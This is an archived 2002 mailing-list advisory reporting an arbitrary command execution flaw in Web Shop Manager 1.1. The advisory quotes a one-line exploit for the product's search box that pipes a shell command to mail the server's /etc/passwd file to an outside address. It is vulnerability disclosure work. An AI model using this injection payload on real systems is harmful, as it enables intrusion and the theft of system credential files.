OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Tacettin Karadeniz (tacettinkaradeniz_at_yahoo.com)
Date: Thu Aug 15 2002 - 05:15:37 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Summary
    The Web Shop
    Manager(http://www.webscriptworld.com/scripts/wsm.phtml)
    allows you to manage a fully functional online store
    from a centralized web-based administration system. A
    security vulnerability in the product allows executing
    of arbitrary commands with the privileges of the
    script file used by the product.

    Details
    Vulnerable systems:
     * Web Shop Manager version 1.1

    Exploit:
    It is possible to send server's password file any mail
    address by writing the following command in Web Shop
    Manager's search box:

     |mail userhost.com < /etc/passwd

     

    __________________________________________________
    Do You Yahoo!?
    HotJobs - Search Thousands of New Jobs
    http://www.hotjobs.com